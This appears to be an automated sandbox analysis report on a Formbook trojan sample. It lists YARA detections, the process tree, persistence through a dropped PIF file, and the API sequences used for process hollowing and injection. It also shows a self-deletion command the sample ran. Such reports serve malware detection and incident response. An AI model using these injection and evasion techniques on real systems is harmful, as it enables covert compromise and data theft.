              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: Fpopgapwdcgvxn.exe PID: 2268, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: colorcpl.exe PID: 5112, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
              Source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: colorcpl.exe PID: 6928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: chkdsk.exe PID: 6856, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: String function: 032B4B0C appears 357 times
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: String function: 032B6B54 appears 87 times
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: String function: 032B4980 appears 76 times
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: String function: 032B4788 appears 84 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 1E675130 appears 58 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 1E6AEA12 appears 86 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 1E62B970 appears 280 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 1E687E54 appears 102 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 1E6BF290 appears 105 times
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_0330CB08 InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,0_2_0330CB08
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_03308E64 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,RtlCreateUserThread,CloseHandle,0_2_03308E64
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_0330B780 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0330B780
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_0330B69C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0330B69C
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032CFB88 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_032CFB88
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032CFD40 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,GetCurrentProcess,NtFlushInstructionCache,FreeLibrary,0_2_032CFD40
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_0330B614 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0330B614
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032CFB86 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_032CFB86
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032D7E64 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_032D7E64
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032CFCE0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_032CFCE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA450 NtClose,3_2_068CA450
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA500 NtAllocateVirtualMemory,3_2_068CA500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA3D0 NtReadFile,3_2_068CA3D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA320 NtCreateFile,3_2_068CA320
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA4FA NtAllocateVirtualMemory,3_2_068CA4FA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA44A NtClose,3_2_068CA44A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA3CB NtReadFile,3_2_068CA3CB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA322 NtCreateFile,3_2_068CA322
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068CA373 NtCreateFile,3_2_068CA373
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_1E672EA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_1E672E80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672F30 NtCreateSection,LdrInitializeThunk,3_2_1E672F30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672FE0 NtCreateFile,LdrInitializeThunk,3_2_1E672FE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672FB0 NtResumeThread,LdrInitializeThunk,3_2_1E672FB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_1E672F90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_1E672C70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_1E672CA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_1E672D30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672D10 NtMapViewOfSection,LdrInitializeThunk,3_2_1E672D10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_1E672DF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672DD0 NtDelayExecution,LdrInitializeThunk,3_2_1E672DD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672AD0 NtReadFile,LdrInitializeThunk,3_2_1E672AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672B60 NtClose,LdrInitializeThunk,3_2_1E672B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_1E672BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E673D70 NtOpenThread,3_2_1E673D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E673D10 NtOpenProcessToken,3_2_1E673D10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6739B0 NtGetContextThread,3_2_1E6739B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6735C0 NtCreateMutant,3_2_1E6735C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E673010 NtOpenDirectoryObject,3_2_1E673010
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E673090 NtSetValueKey,3_2_1E673090
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672E30 NtWriteVirtualMemory,3_2_1E672E30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672EE0 NtQueueApcThread,3_2_1E672EE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672F60 NtCreateProcessEx,3_2_1E672F60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672FA0 NtQuerySection,3_2_1E672FA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672C60 NtCreateKey,3_2_1E672C60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672C00 NtQueryInformationProcess,3_2_1E672C00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672CF0 NtOpenProcess,3_2_1E672CF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672CC0 NtQueryVirtualMemory,3_2_1E672CC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672D00 NtSetInformationFile,3_2_1E672D00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672DB0 NtEnumerateKey,3_2_1E672DB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672AF0 NtWriteFile,3_2_1E672AF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672AB0 NtWaitForSingleObject,3_2_1E672AB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672BE0 NtQueryValueKey,3_2_1E672BE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672BA0 NtEnumerateValueKey,3_2_1E672BA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672B80 NtQueryInformationFile,3_2_1E672B80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E674650 NtSuspendThread,3_2_1E674650
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E674340 NtSetContextThread,3_2_1E674340
              Source: Fpopgapwdcgvxn.exeBinary or memory string: OriginalFilename vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2322773738.00000000031B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Fpopgapwdcgvxn.exe
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeFile created: C:\Users\Public\Libraries\Telragab.PIFJump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@294/7@13/7
              Source: C:\Windows\explorer.exeFile read: C:\Users\Public\Libraries\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032D3470 GetLastError,FormatMessageA,0_2_032D3470
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Telragab.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032CA27C FindResourceA,LoadResource,SizeofResource,LockResource,0_2_032CA27C
              Source: Fpopgapwdcgvxn.exeReversingLabs: Detection: 70%
              Source: Fpopgapwdcgvxn.exeVirustotal: Detection: 69%
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeFile read: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Telragab.PIF "C:\Users\Public\Libraries\Telragab.PIF"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Telragab.PIF "C:\Users\Public\Libraries\Telragab.PIF"
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 2180
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Telragab.PIF "C:\Users\Public\Libraries\Telragab.PIF" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Telragab.PIF "C:\Users\Public\Libraries\Telragab.PIF" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f6a4b5c1-c228-4a11-af40-362874d34b75
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032CEF94 CoCreateInstance,0_2_032CEF94
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032B8F58 GetDiskFreeSpaceA,0_2_032B8F58
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_03308AB4 CreateToolhelp32Snapshot,0_2_03308AB4
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
              Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4784:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess368
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: Fpopgapwdcgvxn.exeStatic file information: File size 2403840 > 1048576
              Source: Fpopgapwdcgvxn.exeStatic PE information: Raw size of DATA is bigger than: 0x100000 < 0x1c8a00
              Source: Binary string: chkdsk.pdbGCTL source: colorcpl.exe, 0000000C.00000003.2612449594.0000000002661000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2613913537.0000000004590000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2617872903.0000000000590000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: colorcpl.pdbGCTL source: explorer.exe, 00000005.00000002.4633580692.000000001097F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.0000000004DBF000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4612887516.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: colorcpl.pdb source: explorer.exe, 00000005.00000002.4633580692.000000001097F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.0000000004DBF000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4612887516.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: chkdsk.pdb source: colorcpl.exe, 0000000C.00000003.2612449594.0000000002661000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2613913537.0000000004590000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2617872903.0000000000590000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000003.00000003.2320149761.000000000530E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E79E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2318073446.0000000005151000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2389849761.00000000046CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2387898399.0000000004512000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004870000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2580553834.000000000474F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E340000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2578529137.0000000004596000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E4DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2615483603.00000000055AC000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.00000000058FE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.0000000005760000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2613575726.00000000053F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000003.00000003.2320149761.000000000530E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E79E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2318073446.0000000005151000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2389849761.00000000046CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2387898399.0000000004512000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004870000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2580553834.000000000474F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E340000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2578529137.0000000004596000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E4DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2615483603.00000000055AC000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.00000000058FE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.0000000005760000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2613575726.00000000053F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: colorcpl.exe, 00000003.00000002.2388060963.00000000053F0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2386689890.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4615286421.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: rundll32.pdbGCTL source: colorcpl.exe, 00000003.00000002.2388060963.00000000053F0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2386689890.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4615286421.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
